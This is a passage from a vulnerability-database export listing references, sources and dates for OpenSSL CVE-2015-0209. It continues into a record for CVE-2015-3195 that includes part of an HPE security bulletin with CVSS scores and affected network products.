      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0752.html"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0715.html"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142841429220765\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/articles/1384453"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-may/156823.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-may/157177.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2015/jun/msg00002.html"
      },
      {
        "trust": 1.1,
        "url": "http://support.apple.com/kb/ht204942"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
      },
      {
        "trust": 1.1,
        "url": "https://bto.bluecoat.com/security-advisory/sa92"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143213830203296\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2015-2511959.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-1089.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html"
      },
      {
        "trust": 1.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10680"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html"
      },
      {
        "trust": 1.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10110"
      },
      {
        "trust": 1.1,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=1b4a8df38fc9ab3c089ca5765075ee53ec5bd66a"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu95877131"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0209"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293"
      },
      {
        "trust": 0.4,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "https://www.alienvault.com/forums/discussion/4885/security-advisory-alienvault-v5-0-"
      },
      {
        "trust": 0.3,
        "url": "https://support.asperasoft.com/entries/93038317-security-bulletin-vulnerabilities-in-openssl"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/apr/37"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/aug/137"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/aug/134"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/aug/136"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04679334"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005226"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005241"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005254"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958089"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962334"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098144"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020693"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory13.asc"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958903"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963024"
      },
      {
        "trust": 0.3,
        "url": "https://www.openssl.org/news/vulnerabilities.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-04-16.pdf"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903752"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701028"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783"
      },
      {
        "trust": 0.3,
        "url": "www-01.ibm.com/support/docview.wss?uid=swg21701256"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10680\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21882710"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022183"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964164"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903799"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022382"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099273"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902449"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882644"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957903"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902544"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21702160"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022367"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883028"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699778"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902519"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020716"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022103"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902673"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883593"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099272"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700167"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902433"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005257"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21722409"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960212"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960210"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21883249"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964410"
      },
      {
        "trust": 0.3,
        "url": "https://support.f5.com/kb/en-us/solutions/public/16000/300/sol16323.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964686"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?rs=630\u0026uid=swg21970748"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960588"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960668"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903261"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903729"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701326"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701334"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21882955"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0291"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1787"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0290"
      },
      {
        "trust": 0.3,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206"
      },
      {
        "trust": 0.2,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2537-1/"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150320-openssl"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=39581"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-c54de3da8602433283d55e7369"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-676ddad17a06423589ee8889d0"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-72d53359c85340f899e81986a7"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0289"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0293"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0208"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0291"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0207"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0288"
      },
      {
        "trust": 0.1,
        "url": "http://openssl.org/news/secadv_20150319.txt"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-1787"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0285"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0292"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0290"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0204"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0287"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/releasestrat.html),"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/about/secpolicy.html"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/go/insightupdates"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/go/smh"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:06/openssl-1.0.1.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:06/openssl-0.9.8.patch"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-15:06.openssl.asc\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://www.freebsd.org/handbook/makeworld.html\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:06/openssl-1.0.1.patch"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/news/secadv_20150319.txt\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-15:06/openssl-0.9.8.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "db": "BID",
        "id": "73239"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "PACKETSTORM",
        "id": "133318"
      },
      {
        "db": "PACKETSTORM",
        "id": "131023"
      },
      {
        "db": "PACKETSTORM",
        "id": "130916"
      },
      {
        "db": "PACKETSTORM",
        "id": "130933"
      },
      {
        "db": "PACKETSTORM",
        "id": "133325"
      },
      {
        "db": "PACKETSTORM",
        "id": "132763"
      },
      {
        "db": "PACKETSTORM",
        "id": "130932"
      },
      {
        "db": "PACKETSTORM",
        "id": "131585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "db": "BID",
        "id": "73239"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "db": "PACKETSTORM",
        "id": "133318"
      },
      {
        "db": "PACKETSTORM",
        "id": "131023"
      },
      {
        "db": "PACKETSTORM",
        "id": "130916"
      },
      {
        "db": "PACKETSTORM",
        "id": "130933"
      },
      {
        "db": "PACKETSTORM",
        "id": "133325"
      },
      {
        "db": "PACKETSTORM",
        "id": "132763"
      },
      {
        "db": "PACKETSTORM",
        "id": "130932"
      },
      {
        "db": "PACKETSTORM",
        "id": "131585"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "date": "2015-03-19T00:00:00",
        "db": "BID",
        "id": "73239"
      },
      {
        "date": "2015-03-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "date": "2015-08-26T01:33:25",
        "db": "PACKETSTORM",
        "id": "133318"
      },
      {
        "date": "2015-03-25T15:48:03",
        "db": "PACKETSTORM",
        "id": "131023"
      },
      {
        "date": "2015-03-20T04:45:06",
        "db": "PACKETSTORM",
        "id": "130916"
      },
      {
        "date": "2015-03-20T05:46:26",
        "db": "PACKETSTORM",
        "id": "130933"
      },
      {
        "date": "2015-08-26T01:35:08",
        "db": "PACKETSTORM",
        "id": "133325"
      },
      {
        "date": "2015-07-21T13:37:51",
        "db": "PACKETSTORM",
        "id": "132763"
      },
      {
        "date": "2015-03-20T05:41:10",
        "db": "PACKETSTORM",
        "id": "130932"
      },
      {
        "date": "2015-04-22T20:14:53",
        "db": "PACKETSTORM",
        "id": "131585"
      },
      {
        "date": "2015-03-19T22:59:02.617000",
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-0209"
      },
      {
        "date": "2017-05-23T16:24:00",
        "db": "BID",
        "id": "73239"
      },
      {
        "date": "2016-11-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      },
      {
        "date": "2023-11-07T02:23:19.410000",
        "db": "NVD",
        "id": "CVE-2015-0209"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "73239"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "OpenSSL of  crypto/ec/ec_asn1.c of  d2i_ECPrivateKey Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-001879"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "73239"
      }
    ],
    "trust": 0.3
  }
}

VAR-201512-0484

Vulnerability from variot - Updated: 2024-07-23 20:40

The ASN1_TFLG_COMBINE implementation in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zh, 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1q, and 1.0.2 before 1.0.2e mishandles errors caused by malformed X509_ATTRIBUTE data, which allows remote attackers to obtain sensitive information from process memory by triggering a decoding failure in a PKCS#7 or CMS application. OpenSSL is an open source SSL implementation used to implement high-strength encryption of network communications.

OpenSSL's handling of X509_ATTRIBUTE has a security vulnerability. A remote attacker can use the vulnerability to send a message containing a special X509_ATTRIBUTE structure to trigger a memory leak. The attacker can obtain sensitive information. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. The vulnerability is due to the error caused by the program not correctly handling the malformed X509_ATTRIBUTE data. The following versions are affected: OpenSSL prior to 0.9.8zh, 1.0.0 prior to 1.0.0t, 1.0.1 prior to 1.0.1q, 1.0.2 prior to 1.0.2e. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05398322 Version: 1

HPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2017-02-21 Last Updated: 2017-02-21

Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information

Source: Hewlett Packard Enterprise, Product Security Response Team

References:

CVE-2015-1794 - Remote Denial of Service (DoS)
CVE-2015-3193 - Remote disclosure of sensitive information
CVE-2015-3194 - Remote Denial of Service (DoS)
CVE-2015-3195 - Remote disclosure of sensitive information
CVE-2015-3196 - Remote Denial of Service (DoS)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
HPE Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2015-1794
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-3193
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)

CVE-2015-3194
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-3195
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-3196
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has made the following software updates to resolve the vulnerabilities in the Comware, IMC and VCX products running OpenSSL.

COMWARE 5 Products

A6600 (Comware 5) - Version: R3303P28
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
HSR6602 (Comware 5) - Version: R3303P28
- HP Network Products
- JC176A HP 6602 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
